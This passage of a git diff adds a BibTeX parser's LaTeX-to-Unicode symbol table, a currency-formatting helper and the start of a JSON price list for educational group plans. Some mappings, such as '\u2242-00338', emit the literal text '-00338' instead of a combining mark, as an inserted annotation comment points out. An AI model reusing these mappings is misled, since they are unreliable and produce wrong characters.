/g, '\u2242-00338'], + [/\\simeq /g, '\u2243'], + [/\\not\\simeq /g, '\u2244'], + [/\\cong /g, '\u2245'], + [/\\approxnotequal /g, '\u2246'], + [/\\not\\cong /g, '\u2247'], + [/\\approx /g, '\u2248'], + [/\\not\\approx /g, '\u2249'], + [/\\approxeq /g, '\u224A'], + [/\\tildetrpl /g, '\u224B'], + [/\\not\\apid /g, '\u224B-00338'], + [/\\allequal /g, '\u224C'], + [/\\asymp /g, '\u224D'], + [/\\Bumpeq /g, '\u224E'], + [/\\NotHumpDownHump /g, '\u224E-00338'], + [/\\bumpeq /g, '\u224F'], + [/\\NotHumpEqual /g, '\u224F-00338'], + [/\\doteq /g, '\u2250'], + [/\\not\\doteq/g, '\u2250-00338'], + [/\\doteqdot /g, '\u2251'], + [/\\fallingdotseq /g, '\u2252'], + [/\\risingdotseq /g, '\u2253'], + [/\\eqcirc /g, '\u2256'], + [/\\circeq /g, '\u2257'], + [/\\estimates /g, '\u2259'], + [/\\ElsevierGlyph\{225A\}/g, '\u225A'], + [/\\starequal /g, '\u225B'], + [/\\triangleq /g, '\u225C'], + [/\\ElsevierGlyph\{225F\}/g, '\u225F'], + [/\\not =/g, '\u2260'], + [/\\equiv /g, '\u2261'], + [/\\not\\equiv /g, '\u2262'], + [/\\leq /g, '\u2264'], + [/\\geq /g, '\u2265'], + [/\\leqq /g, '\u2266'], + [/\\geqq /g, '\u2267'], + [/\\lneqq /g, '\u2268'], + [/\\lvertneqq /g, '\u2268-0FE00'], + [/\\gneqq /g, '\u2269'], + [/\\gvertneqq /g, '\u2269-0FE00'], + [/\\ll /g, '\u226A'], + [/\\NotLessLess /g, '\u226A-00338'], + [/\\gg /g, '\u226B'], + [/\\NotGreaterGreater /g, '\u226B-00338'], + [/\\between /g, '\u226C'], + [/\\not\\kern\-0.3em\\times /g, '\u226D'], + [/\\not</g, '\u226E'], + [/\\not>/g, '\u226F'], + [/\\not\\leq /g, '\u2270'], + [/\\not\\geq /g, '\u2271'], + [/\\lessequivlnt /g, '\u2272'], + [/\\greaterequivlnt /g, '\u2273'], + [/\\ElsevierGlyph\{2274\}/g, '\u2274'], + [/\\ElsevierGlyph\{2275\}/g, '\u2275'], + [/\\lessgtr /g, '\u2276'], + [/\\gtrless /g, '\u2277'], + [/\\notlessgreater /g, '\u2278'], + [/\\notgreaterless /g, '\u2279'], + [/\\prec /g, '\u227A'], + [/\\succ /g, '\u227B'], + [/\\preccurlyeq /g, '\u227C'], + [/\\succcurlyeq /g, '\u227D'], + [/\\precapprox /g, '\u227E'], + [/\\NotPrecedesTilde /g, '\u227E-00338'], + [/\\succapprox /g, '\u227F'], + [/\\NotSucceedsTilde /g, '\u227F-00338'], + [/\\not\\prec /g, '\u2280'], + [/\\not\\succ /g, '\u2281'], + [/\\subset /g, '\u2282'], + [/\\supset /g, '\u2283'], + [/\\not\\subset /g, '\u2284'], + [/\\not\\supset /g, '\u2285'], + 
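+  // NOTE (editor annotation, not part of the original source): replacement
+  // strings of the form '\u2242-00338' above appear to encode a base character
+  // plus a combining code point (U+0338, combining long solidus overlay). As
+  // written they insert the literal text '-00338' after the base character
+  // rather than the combining mark itself; they are kept here exactly as found.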
[/\\subseteq /g, '\u2286'], + [/\\supseteq /g, '\u2287'], + [/\\not\\subseteq /g, '\u2288'], + [/\\not\\supseteq /g, '\u2289'], + [/\\subsetneq /g, '\u228A'], + [/\\varsubsetneqq /g, '\u228A-0FE00'], + [/\\supsetneq /g, '\u228B'], + [/\\varsupsetneq /g, '\u228B-0FE00'], + [/\\uplus /g, '\u228E'], + [/\\sqsubset /g, '\u228F'], + [/\\NotSquareSubset /g, '\u228F-00338'], + [/\\sqsupset /g, '\u2290'], + [/\\NotSquareSuperset /g, '\u2290-00338'], + [/\\sqsubseteq /g, '\u2291'], + [/\\sqsupseteq /g, '\u2292'], + [/\\sqcap /g, '\u2293'], + [/\\sqcup /g, '\u2294'], + [/\\oplus /g, '\u2295'], + [/\\ominus /g, '\u2296'], + [/\\otimes /g, '\u2297'], + [/\\oslash /g, '\u2298'], + [/\\odot /g, '\u2299'], + [/\\circledcirc /g, '\u229A'], + [/\\circledast /g, '\u229B'], + [/\\circleddash /g, '\u229D'], + [/\\boxplus /g, '\u229E'], + [/\\boxminus /g, '\u229F'], + [/\\boxtimes /g, '\u22A0'], + [/\\boxdot /g, '\u22A1'], + [/\\vdash /g, '\u22A2'], + [/\\dashv /g, '\u22A3'], + [/\\top /g, '\u22A4'], + [/\\perp /g, '\u22A5'], + [/\\truestate /g, '\u22A7'], + [/\\forcesextra /g, '\u22A8'], + [/\\Vdash /g, '\u22A9'], + [/\\Vvdash /g, '\u22AA'], + [/\\VDash /g, '\u22AB'], + [/\\nvdash /g, '\u22AC'], + [/\\nvDash /g, '\u22AD'], + [/\\nVdash /g, '\u22AE'], + [/\\nVDash /g, '\u22AF'], + [/\\vartriangleleft /g, '\u22B2'], + [/\\vartriangleright /g, '\u22B3'], + [/\\trianglelefteq /g, '\u22B4'], + [/\\trianglerighteq /g, '\u22B5'], + [/\\original /g, '\u22B6'], + [/\\image /g, '\u22B7'], + [/\\multimap /g, '\u22B8'], + [/\\hermitconjmatrix /g, '\u22B9'], + [/\\intercal /g, '\u22BA'], + [/\\veebar /g, '\u22BB'], + [/\\rightanglearc /g, '\u22BE'], + [/\\ElsevierGlyph\{22C0\}/g, '\u22C0'], + [/\\ElsevierGlyph\{22C1\}/g, '\u22C1'], + [/\\bigcap /g, '\u22C2'], + [/\\bigcup /g, '\u22C3'], + [/\\diamond /g, '\u22C4'], + [/\\cdot /g, '\u22C5'], + [/\\star /g, '\u22C6'], + [/\\divideontimes /g, '\u22C7'], + [/\\bowtie /g, '\u22C8'], + [/\\ltimes /g, '\u22C9'], + [/\\rtimes /g, '\u22CA'], + [/\\leftthreetimes /g, '\u22CB'], + [/\\rightthreetimes /g, '\u22CC'], + [/\\backsimeq /g, '\u22CD'], + [/\\curlyvee /g, '\u22CE'], + [/\\curlywedge /g, '\u22CF'], + [/\\Subset /g, '\u22D0'], + [/\\Supset /g, '\u22D1'], + [/\\Cap /g, '\u22D2'], + [/\\Cup /g, '\u22D3'], + [/\\pitchfork /g, '\u22D4'], + [/\\lessdot /g, '\u22D6'], + [/\\gtrdot /g, '\u22D7'], + [/\\verymuchless /g, '\u22D8'], + [/\\verymuchgreater /g, '\u22D9'], + [/\\lesseqgtr /g, '\u22DA'], + [/\\gtreqless /g, '\u22DB'], + [/\\curlyeqprec /g, '\u22DE'], + [/\\curlyeqsucc /g, '\u22DF'], + [/\\not\\sqsubseteq /g, '\u22E2'], + [/\\not\\sqsupseteq /g, '\u22E3'], + [/\\Elzsqspne /g, '\u22E5'], + [/\\lnsim /g, '\u22E6'], + [/\\gnsim /g, '\u22E7'], + [/\\precedesnotsimilar /g, '\u22E8'], + [/\\succnsim /g, '\u22E9'], + [/\\ntriangleleft /g, '\u22EA'], + [/\\ntriangleright /g, '\u22EB'], + [/\\ntrianglelefteq /g, '\u22EC'], + [/\\ntrianglerighteq /g, '\u22ED'], + [/\\vdots /g, '\u22EE'], + [/\\cdots /g, '\u22EF'], + [/\\upslopeellipsis /g, '\u22F0'], + [/\\downslopeellipsis /g, '\u22F1'], + [/\\barwedge /g, '\u2305'], + [/\\perspcorrespond /g, '\u2306'], + [/\\lceil /g, '\u2308'], + [/\\rceil /g, '\u2309'], + [/\\lfloor /g, '\u230A'], + [/\\rfloor /g, '\u230B'], + [/\\recorder /g, '\u2315'], + [/\\mathchar"2208/g, '\u2316'], + [/\\ulcorner /g, '\u231C'], + [/\\urcorner /g, '\u231D'], + [/\\llcorner /g, '\u231E'], + [/\\lrcorner /g, '\u231F'], + [/\\frown /g, '\u2322'], + [/\\smile /g, '\u2323'], + [/\\langle /g, '\u2329'], + [/\\rangle /g, '\u232A'], + [/\\ElsevierGlyph\{E838\}/g, 
'\u233D'], + [/\\Elzdlcorn /g, '\u23A3'], + [/\\lmoustache /g, '\u23B0'], + [/\\rmoustache /g, '\u23B1'], + [/\\textvisiblespace /g, '\u2423'], + [/\\ding\{172\}/g, '\u2460'], + [/\\ding\{173\}/g, '\u2461'], + [/\\ding\{174\}/g, '\u2462'], + [/\\ding\{175\}/g, '\u2463'], + [/\\ding\{176\}/g, '\u2464'], + [/\\ding\{177\}/g, '\u2465'], + [/\\ding\{178\}/g, '\u2466'], + [/\\ding\{179\}/g, '\u2467'], + [/\\ding\{180\}/g, '\u2468'], + [/\\ding\{181\}/g, '\u2469'], + [/\\circledS /g, '\u24C8'], + [/\\Elzdshfnc /g, '\u2506'], + [/\\Elzsqfnw /g, '\u2519'], + [/\\diagup /g, '\u2571'], + [/\\ding\{110\}/g, '\u25A0'], + [/\\square /g, '\u25A1'], + [/\\blacksquare /g, '\u25AA'], + [/\\fbox\{~~\}/g, '\u25AD'], + [/\\Elzvrecto /g, '\u25AF'], + [/\\ElsevierGlyph\{E381\}/g, '\u25B1'], + [/\\ding\{115\}/g, '\u25B2'], + [/\\bigtriangleup /g, '\u25B3'], + [/\\blacktriangle /g, '\u25B4'], + [/\\vartriangle /g, '\u25B5'], + [/\\blacktriangleright /g, '\u25B8'], + [/\\triangleright /g, '\u25B9'], + [/\\ding\{116\}/g, '\u25BC'], + [/\\bigtriangledown /g, '\u25BD'], + [/\\blacktriangledown /g, '\u25BE'], + [/\\triangledown /g, '\u25BF'], + [/\\blacktriangleleft /g, '\u25C2'], + [/\\triangleleft /g, '\u25C3'], + [/\\ding\{117\}/g, '\u25C6'], + [/\\lozenge /g, '\u25CA'], + [/\\bigcirc /g, '\u25CB'], + [/\\ding\{108\}/g, '\u25CF'], + [/\\Elzcirfl /g, '\u25D0'], + [/\\Elzcirfr /g, '\u25D1'], + [/\\Elzcirfb /g, '\u25D2'], + [/\\ding\{119\}/g, '\u25D7'], + [/\\Elzrvbull /g, '\u25D8'], + [/\\Elzsqfl /g, '\u25E7'], + [/\\Elzsqfr /g, '\u25E8'], + [/\\Elzsqfse /g, '\u25EA'], + [/\\bigcirc /g, '\u25EF'], + [/\\ding\{72\}/g, '\u2605'], + [/\\ding\{73\}/g, '\u2606'], + [/\\ding\{37\}/g, '\u260E'], + [/\\ding\{42\}/g, '\u261B'], + [/\\ding\{43\}/g, '\u261E'], + [/\\rightmoon /g, '\u263E'], + [/\\mercury /g, '\u263F'], + [/\\venus /g, '\u2640'], + [/\\male /g, '\u2642'], + [/\\jupiter /g, '\u2643'], + [/\\saturn /g, '\u2644'], + [/\\uranus /g, '\u2645'], + [/\\neptune /g, '\u2646'], + [/\\pluto /g, '\u2647'], + [/\\aries /g, '\u2648'], + [/\\taurus /g, '\u2649'], + [/\\gemini /g, '\u264A'], + [/\\cancer /g, '\u264B'], + [/\\leo /g, '\u264C'], + [/\\virgo /g, '\u264D'], + [/\\libra /g, '\u264E'], + [/\\scorpio /g, '\u264F'], + [/\\sagittarius /g, '\u2650'], + [/\\capricornus /g, '\u2651'], + [/\\aquarius /g, '\u2652'], + [/\\pisces /g, '\u2653'], + [/\\ding\{171\}/g, '\u2660'], + [/\\diamond /g, '\u2662'], + [/\\ding\{168\}/g, '\u2663'], + [/\\ding\{170\}/g, '\u2665'], + [/\\ding\{169\}/g, '\u2666'], + [/\\quarternote /g, '\u2669'], + [/\\eighthnote /g, '\u266A'], + [/\\flat /g, '\u266D'], + [/\\natural /g, '\u266E'], + [/\\sharp /g, '\u266F'], + [/\\ding\{33\}/g, '\u2701'], + [/\\ding\{34\}/g, '\u2702'], + [/\\ding\{35\}/g, '\u2703'], + [/\\ding\{36\}/g, '\u2704'], + [/\\ding\{38\}/g, '\u2706'], + [/\\ding\{39\}/g, '\u2707'], + [/\\ding\{40\}/g, '\u2708'], + [/\\ding\{41\}/g, '\u2709'], + [/\\ding\{44\}/g, '\u270C'], + [/\\ding\{45\}/g, '\u270D'], + [/\\ding\{46\}/g, '\u270E'], + [/\\ding\{47\}/g, '\u270F'], + [/\\ding\{48\}/g, '\u2710'], + [/\\ding\{49\}/g, '\u2711'], + [/\\ding\{50\}/g, '\u2712'], + [/\\ding\{51\}/g, '\u2713'], + [/\\ding\{52\}/g, '\u2714'], + [/\\ding\{53\}/g, '\u2715'], + [/\\ding\{54\}/g, '\u2716'], + [/\\ding\{55\}/g, '\u2717'], + [/\\ding\{56\}/g, '\u2718'], + [/\\ding\{57\}/g, '\u2719'], + [/\\ding\{58\}/g, '\u271A'], + [/\\ding\{59\}/g, '\u271B'], + [/\\ding\{60\}/g, '\u271C'], + [/\\ding\{61\}/g, '\u271D'], + [/\\ding\{62\}/g, '\u271E'], + [/\\ding\{63\}/g, '\u271F'], + [/\\ding\{64\}/g, '\u2720'], + 
[/\\ding\{65\}/g, '\u2721'], + [/\\ding\{66\}/g, '\u2722'], + [/\\ding\{67\}/g, '\u2723'], + [/\\ding\{68\}/g, '\u2724'], + [/\\ding\{69\}/g, '\u2725'], + [/\\ding\{70\}/g, '\u2726'], + [/\\ding\{71\}/g, '\u2727'], + [/\\ding\{73\}/g, '\u2729'], + [/\\ding\{74\}/g, '\u272A'], + [/\\ding\{75\}/g, '\u272B'], + [/\\ding\{76\}/g, '\u272C'], + [/\\ding\{77\}/g, '\u272D'], + [/\\ding\{78\}/g, '\u272E'], + [/\\ding\{79\}/g, '\u272F'], + [/\\ding\{80\}/g, '\u2730'], + [/\\ding\{81\}/g, '\u2731'], + [/\\ding\{82\}/g, '\u2732'], + [/\\ding\{83\}/g, '\u2733'], + [/\\ding\{84\}/g, '\u2734'], + [/\\ding\{85\}/g, '\u2735'], + [/\\ding\{86\}/g, '\u2736'], + [/\\ding\{87\}/g, '\u2737'], + [/\\ding\{88\}/g, '\u2738'], + [/\\ding\{89\}/g, '\u2739'], + [/\\ding\{90\}/g, '\u273A'], + [/\\ding\{91\}/g, '\u273B'], + [/\\ding\{92\}/g, '\u273C'], + [/\\ding\{93\}/g, '\u273D'], + [/\\ding\{94\}/g, '\u273E'], + [/\\ding\{95\}/g, '\u273F'], + [/\\ding\{96\}/g, '\u2740'], + [/\\ding\{97\}/g, '\u2741'], + [/\\ding\{98\}/g, '\u2742'], + [/\\ding\{99\}/g, '\u2743'], + [/\\ding\{100\}/g, '\u2744'], + [/\\ding\{101\}/g, '\u2745'], + [/\\ding\{102\}/g, '\u2746'], + [/\\ding\{103\}/g, '\u2747'], + [/\\ding\{104\}/g, '\u2748'], + [/\\ding\{105\}/g, '\u2749'], + [/\\ding\{106\}/g, '\u274A'], + [/\\ding\{107\}/g, '\u274B'], + [/\\ding\{109\}/g, '\u274D'], + [/\\ding\{111\}/g, '\u274F'], + [/\\ding\{112\}/g, '\u2750'], + [/\\ding\{113\}/g, '\u2751'], + [/\\ding\{114\}/g, '\u2752'], + [/\\ding\{118\}/g, '\u2756'], + [/\\ding\{120\}/g, '\u2758'], + [/\\ding\{121\}/g, '\u2759'], + [/\\ding\{122\}/g, '\u275A'], + [/\\ding\{123\}/g, '\u275B'], + [/\\ding\{124\}/g, '\u275C'], + [/\\ding\{125\}/g, '\u275D'], + [/\\ding\{126\}/g, '\u275E'], + [/\\ding\{161\}/g, '\u2761'], + [/\\ding\{162\}/g, '\u2762'], + [/\\ding\{163\}/g, '\u2763'], + [/\\ding\{164\}/g, '\u2764'], + [/\\ding\{165\}/g, '\u2765'], + [/\\ding\{166\}/g, '\u2766'], + [/\\ding\{167\}/g, '\u2767'], + [/\\ding\{182\}/g, '\u2776'], + [/\\ding\{183\}/g, '\u2777'], + [/\\ding\{184\}/g, '\u2778'], + [/\\ding\{185\}/g, '\u2779'], + [/\\ding\{186\}/g, '\u277A'], + [/\\ding\{187\}/g, '\u277B'], + [/\\ding\{188\}/g, '\u277C'], + [/\\ding\{189\}/g, '\u277D'], + [/\\ding\{190\}/g, '\u277E'], + [/\\ding\{191\}/g, '\u277F'], + [/\\ding\{192\}/g, '\u2780'], + [/\\ding\{193\}/g, '\u2781'], + [/\\ding\{194\}/g, '\u2782'], + [/\\ding\{195\}/g, '\u2783'], + [/\\ding\{196\}/g, '\u2784'], + [/\\ding\{197\}/g, '\u2785'], + [/\\ding\{198\}/g, '\u2786'], + [/\\ding\{199\}/g, '\u2787'], + [/\\ding\{200\}/g, '\u2788'], + [/\\ding\{201\}/g, '\u2789'], + [/\\ding\{202\}/g, '\u278A'], + [/\\ding\{203\}/g, '\u278B'], + [/\\ding\{204\}/g, '\u278C'], + [/\\ding\{205\}/g, '\u278D'], + [/\\ding\{206\}/g, '\u278E'], + [/\\ding\{207\}/g, '\u278F'], + [/\\ding\{208\}/g, '\u2790'], + [/\\ding\{209\}/g, '\u2791'], + [/\\ding\{210\}/g, '\u2792'], + [/\\ding\{211\}/g, '\u2793'], + [/\\ding\{212\}/g, '\u2794'], + [/\\ding\{216\}/g, '\u2798'], + [/\\ding\{217\}/g, '\u2799'], + [/\\ding\{218\}/g, '\u279A'], + [/\\ding\{219\}/g, '\u279B'], + [/\\ding\{220\}/g, '\u279C'], + [/\\ding\{221\}/g, '\u279D'], + [/\\ding\{222\}/g, '\u279E'], + [/\\ding\{223\}/g, '\u279F'], + [/\\ding\{224\}/g, '\u27A0'], + [/\\ding\{225\}/g, '\u27A1'], + [/\\ding\{226\}/g, '\u27A2'], + [/\\ding\{227\}/g, '\u27A3'], + [/\\ding\{228\}/g, '\u27A4'], + [/\\ding\{229\}/g, '\u27A5'], + [/\\ding\{230\}/g, '\u27A6'], + [/\\ding\{231\}/g, '\u27A7'], + [/\\ding\{232\}/g, '\u27A8'], + [/\\ding\{233\}/g, '\u27A9'], + [/\\ding\{234\}/g, '\u27AA'], + 
[/\\ding\{235\}/g, '\u27AB'], + [/\\ding\{236\}/g, '\u27AC'], + [/\\ding\{237\}/g, '\u27AD'], + [/\\ding\{238\}/g, '\u27AE'], + [/\\ding\{239\}/g, '\u27AF'], + [/\\ding\{241\}/g, '\u27B1'], + [/\\ding\{242\}/g, '\u27B2'], + [/\\ding\{243\}/g, '\u27B3'], + [/\\ding\{244\}/g, '\u27B4'], + [/\\ding\{245\}/g, '\u27B5'], + [/\\ding\{246\}/g, '\u27B6'], + [/\\ding\{247\}/g, '\u27B7'], + [/\\ding\{248\}/g, '\u27B8'], + [/\\ding\{249\}/g, '\u27B9'], + [/\\ding\{250\}/g, '\u27BA'], + [/\\ding\{251\}/g, '\u27BB'], + [/\\ding\{252\}/g, '\u27BC'], + [/\\ding\{253\}/g, '\u27BD'], + [/\\ding\{254\}/g, '\u27BE'], + [/\\longleftarrow /g, '\u27F5'], + [/\\longrightarrow /g, '\u27F6'], + [/\\longleftrightarrow /g, '\u27F7'], + [/\\Longleftarrow /g, '\u27F8'], + [/\\Longrightarrow /g, '\u27F9'], + [/\\Longleftrightarrow /g, '\u27FA'], + [/\\longmapsto /g, '\u27FC'], + [/\\sim\\joinrel\\leadsto/g, '\u27FF'], + [/\\ElsevierGlyph\{E212\}/g, '\u2905'], + [/\\UpArrowBar /g, '\u2912'], + [/\\DownArrowBar /g, '\u2913'], + [/\\ElsevierGlyph\{E20C\}/g, '\u2923'], + [/\\ElsevierGlyph\{E20D\}/g, '\u2924'], + [/\\ElsevierGlyph\{E20B\}/g, '\u2925'], + [/\\ElsevierGlyph\{E20A\}/g, '\u2926'], + [/\\ElsevierGlyph\{E211\}/g, '\u2927'], + [/\\ElsevierGlyph\{E20E\}/g, '\u2928'], + [/\\ElsevierGlyph\{E20F\}/g, '\u2929'], + [/\\ElsevierGlyph\{E210\}/g, '\u292A'], + [/\\ElsevierGlyph\{E21C\}/g, '\u2933'], + [/\\ElsevierGlyph\{E21D\}/g, '\u2933-00338'], + [/\\ElsevierGlyph\{E21A\}/g, '\u2936'], + [/\\ElsevierGlyph\{E219\}/g, '\u2937'], + [/\\Elolarr /g, '\u2940'], + [/\\Elorarr /g, '\u2941'], + [/\\ElzRlarr /g, '\u2942'], + [/\\ElzrLarr /g, '\u2944'], + [/\\Elzrarrx /g, '\u2947'], + [/\\LeftRightVector /g, '\u294E'], + [/\\RightUpDownVector /g, '\u294F'], + [/\\DownLeftRightVector /g, '\u2950'], + [/\\LeftUpDownVector /g, '\u2951'], + [/\\LeftVectorBar /g, '\u2952'], + [/\\RightVectorBar /g, '\u2953'], + [/\\RightUpVectorBar /g, '\u2954'], + [/\\RightDownVectorBar /g, '\u2955'], + [/\\DownLeftVectorBar /g, '\u2956'], + [/\\DownRightVectorBar /g, '\u2957'], + [/\\LeftUpVectorBar /g, '\u2958'], + [/\\LeftDownVectorBar /g, '\u2959'], + [/\\LeftTeeVector /g, '\u295A'], + [/\\RightTeeVector /g, '\u295B'], + [/\\RightUpTeeVector /g, '\u295C'], + [/\\RightDownTeeVector /g, '\u295D'], + [/\\DownLeftTeeVector /g, '\u295E'], + [/\\DownRightTeeVector /g, '\u295F'], + [/\\LeftUpTeeVector /g, '\u2960'], + [/\\LeftDownTeeVector /g, '\u2961'], + [/\\UpEquilibrium /g, '\u296E'], + [/\\ReverseUpEquilibrium /g, '\u296F'], + [/\\RoundImplies /g, '\u2970'], + [/\\ElsevierGlyph\{E214\}/g, '\u297C'], + [/\\ElsevierGlyph\{E215\}/g, '\u297D'], + [/\\Elztfnc /g, '\u2980'], + [/\\ElsevierGlyph\{3018\}/g, '\u2985'], + [/\\Elroang /g, '\u2986'], + [/\\ElsevierGlyph\{E291\}/g, '\u2994'], + [/\\Elzddfnc /g, '\u2999'], + [/\\Angle /g, '\u299C'], + [/\\Elzlpargt /g, '\u29A0'], + [/\\ElsevierGlyph\{E260\}/g, '\u29B5'], + [/\\ElsevierGlyph\{E61B\}/g, '\u29B6'], + [/\\ElzLap /g, '\u29CA'], + [/\\Elzdefas /g, '\u29CB'], + [/\\LeftTriangleBar /g, '\u29CF'], + [/\\NotLeftTriangleBar /g, '\u29CF-00338'], + [/\\RightTriangleBar /g, '\u29D0'], + [/\\NotRightTriangleBar /g, '\u29D0-00338'], + [/\\ElsevierGlyph\{E372\}/g, '\u29DC'], + [/\\blacklozenge /g, '\u29EB'], + [/\\RuleDelayed /g, '\u29F4'], + [/\\Elxuplus /g, '\u2A04'], + [/\\ElzThr /g, '\u2A05'], + [/\\Elxsqcup /g, '\u2A06'], + [/\\ElzInf /g, '\u2A07'], + [/\\ElzSup /g, '\u2A08'], + [/\\ElzCint /g, '\u2A0D'], + [/\\clockoint /g, '\u2A0F'], + [/\\ElsevierGlyph\{E395\}/g, '\u2A10'], + [/\\sqrint /g, '\u2A16'], + 
[/\\ElsevierGlyph\{E25A\}/g, '\u2A25'], + [/\\ElsevierGlyph\{E25B\}/g, '\u2A2A'], + [/\\ElsevierGlyph\{E25C\}/g, '\u2A2D'], + [/\\ElsevierGlyph\{E25D\}/g, '\u2A2E'], + [/\\ElzTimes /g, '\u2A2F'], + [/\\ElsevierGlyph\{E25E\}/g, '\u2A34'], + [/\\ElsevierGlyph\{E25E\}/g, '\u2A35'], + [/\\ElsevierGlyph\{E259\}/g, '\u2A3C'], + [/\\amalg /g, '\u2A3F'], + [/\\ElzAnd /g, '\u2A53'], + [/\\ElzOr /g, '\u2A54'], + [/\\ElsevierGlyph\{E36E\}/g, '\u2A55'], + [/\\ElOr /g, '\u2A56'], + [/\\perspcorrespond /g, '\u2A5E'], + [/\\Elzminhat /g, '\u2A5F'], + [/\\ElsevierGlyph\{225A\}/g, '\u2A63'], + [/\\stackrel\{*\}\{=\}/g, '\u2A6E'], + [/\\Equal /g, '\u2A75'], + [/\\leqslant /g, '\u2A7D'], + [/\\nleqslant /g, '\u2A7D-00338'], + [/\\geqslant /g, '\u2A7E'], + [/\\ngeqslant /g, '\u2A7E-00338'], + [/\\lessapprox /g, '\u2A85'], + [/\\gtrapprox /g, '\u2A86'], + [/\\lneq /g, '\u2A87'], + [/\\gneq /g, '\u2A88'], + [/\\lnapprox /g, '\u2A89'], + [/\\gnapprox /g, '\u2A8A'], + [/\\lesseqqgtr /g, '\u2A8B'], + [/\\gtreqqless /g, '\u2A8C'], + [/\\eqslantless /g, '\u2A95'], + [/\\eqslantgtr /g, '\u2A96'], + [/\\Pisymbol\{ppi020\}\{117\}/g, '\u2A9D'], + [/\\Pisymbol\{ppi020\}\{105\}/g, '\u2A9E'], + [/\\NestedLessLess /g, '\u2AA1'], + [/\\NotNestedLessLess /g, '\u2AA1-00338'], + [/\\NestedGreaterGreater /g, '\u2AA2'], + [/\\NotNestedGreaterGreater /g, '\u2AA2-00338'], + [/\\preceq /g, '\u2AAF'], + [/\\not\\preceq /g, '\u2AAF-00338'], + [/\\succeq /g, '\u2AB0'], + [/\\not\\succeq /g, '\u2AB0-00338'], + [/\\precneqq /g, '\u2AB5'], + [/\\succneqq /g, '\u2AB6'], + [/\\precapprox /g, '\u2AB7'], + [/\\succapprox /g, '\u2AB8'], + [/\\precnapprox /g, '\u2AB9'], + [/\\succnapprox /g, '\u2ABA'], + [/\\subseteqq /g, '\u2AC5'], + [/\\nsubseteqq /g, '\u2AC5-00338'], + [/\\supseteqq /g, '\u2AC6'], + [/\\nsupseteqq/g, '\u2AC6-00338'], + [/\\subsetneqq /g, '\u2ACB'], + [/\\supsetneqq /g, '\u2ACC'], + [/\\ElsevierGlyph\{E30D\}/g, '\u2AEB'], + [/\\Elztdcol /g, '\u2AF6'], + [/\\ElsevierGlyph\{300A\}/g, '\u300A'], + [/\\ElsevierGlyph\{300B\}/g, '\u300B'], + [/\\ElsevierGlyph\{3018\}/g, '\u3018'], + [/\\ElsevierGlyph\{3019\}/g, '\u3019'], + [/\\openbracketleft /g, '\u301A'], + [/\\openbracketright /g, '\u301B'], +] + +if (typeof module !== 'undefined' && module.exports) { + module.exports = BibtexParser +} diff --git a/services/web/app/src/util/currency.js b/services/web/app/src/util/currency.js new file mode 100644 index 0000000..ac66679 --- /dev/null +++ b/services/web/app/src/util/currency.js @@ -0,0 +1,38 @@ +/** + * This file is duplicated from services/web/frontend/js/shared/utils/currency.ts + */ + +/** + * @import { CurrencyCode } from '../../../types/subscription/currency' + */ + +/** + * @param {number} amount + * @param {CurrencyCode} currency + * @param {string} locale + * @param {boolean} stripIfInteger + * @returns {string} + */ +function formatCurrency(amount, currency, locale, stripIfInteger) { + const options = { style: 'currency', currency } + if (stripIfInteger && Number.isInteger(amount)) { + options.minimumFractionDigits = 0 + } + + try { + return amount.toLocaleString(locale, { + ...options, + currencyDisplay: 'narrowSymbol', + }) + } catch {} + + try { + return amount.toLocaleString(locale, options) + } catch {} + + return `${currency} ${amount}` +} + +module.exports = { + formatCurrency, +} diff --git a/services/web/app/templates/plans/groups.json b/services/web/app/templates/plans/groups.json new file mode 100644 index 0000000..1a4994c --- /dev/null +++ b/services/web/app/templates/plans/groups.json @@ -0,0 +1,2054 @@ +{ + 
"educational": { + "professional": { + "AUD": { + "2": { + "price_in_cents": 55000, + "additional_license_legacy_price_in_cents": 32100 + }, + "3": { + "price_in_cents": 82500, + "additional_license_legacy_price_in_cents": 32100 + }, + "4": { + "price_in_cents": 110000, + "additional_license_legacy_price_in_cents": 32100 + }, + "5": { + "price_in_cents": 137500, + "additional_license_legacy_price_in_cents": 32100 + }, + "10": { + "price_in_cents": 275000, + "additional_license_legacy_price_in_cents": 17900 + }, + "20": { + "price_in_cents": 550000, + "additional_license_legacy_price_in_cents": 16500 + }, + "50": { + "price_in_cents": 1375000, + "additional_license_legacy_price_in_cents": 15100 + } + }, + "BRL": { + "2": { + "price_in_cents": 119800, + "additional_license_legacy_price_in_cents": 69900 + }, + "3": { + "price_in_cents": 179700, + "additional_license_legacy_price_in_cents": 69900 + }, + "4": { + "price_in_cents": 239600, + "additional_license_legacy_price_in_cents": 69900 + }, + "5": { + "price_in_cents": 299500, + "additional_license_legacy_price_in_cents": 69900 + }, + "10": { + "price_in_cents": 599000, + "additional_license_legacy_price_in_cents": 38900 + }, + "20": { + "price_in_cents": 1198000, + "additional_license_legacy_price_in_cents": 35900 + }, + "50": { + "price_in_cents": 2995000, + "additional_license_legacy_price_in_cents": 32900 + } + }, + "CAD": { + "2": { + "price_in_cents": 53800, + "additional_license_legacy_price_in_cents": 31400 + }, + "3": { + "price_in_cents": 80700, + "additional_license_legacy_price_in_cents": 31400 + }, + "4": { + "price_in_cents": 107600, + "additional_license_legacy_price_in_cents": 31400 + }, + "5": { + "price_in_cents": 134500, + "additional_license_legacy_price_in_cents": 31400 + }, + "10": { + "price_in_cents": 269000, + "additional_license_legacy_price_in_cents": 17500 + }, + "20": { + "price_in_cents": 538000, + "additional_license_legacy_price_in_cents": 16100 + }, + "50": { + "price_in_cents": 1345000, + "additional_license_legacy_price_in_cents": 14800 + } + }, + "CHF": { + "2": { + "price_in_cents": 47800, + "additional_license_legacy_price_in_cents": 27900 + }, + "3": { + "price_in_cents": 71700, + "additional_license_legacy_price_in_cents": 27900 + }, + "4": { + "price_in_cents": 95600, + "additional_license_legacy_price_in_cents": 27900 + }, + "5": { + "price_in_cents": 119500, + "additional_license_legacy_price_in_cents": 27900 + }, + "10": { + "price_in_cents": 239000, + "additional_license_legacy_price_in_cents": 15500 + }, + "20": { + "price_in_cents": 478000, + "additional_license_legacy_price_in_cents": 14300 + }, + "50": { + "price_in_cents": 1195000, + "additional_license_legacy_price_in_cents": 13100 + } + }, + "CLP": { + "2": { + "price_in_cents": 28918800, + "additional_license_legacy_price_in_cents": 16869300 + }, + "3": { + "price_in_cents": 43378200, + "additional_license_legacy_price_in_cents": 16869300 + }, + "4": { + "price_in_cents": 57837600, + "additional_license_legacy_price_in_cents": 16869300 + }, + "5": { + "price_in_cents": 72297000, + "additional_license_legacy_price_in_cents": 16869300 + }, + "10": { + "price_in_cents": 144594000, + "additional_license_legacy_price_in_cents": 9398600 + }, + "20": { + "price_in_cents": 289188000, + 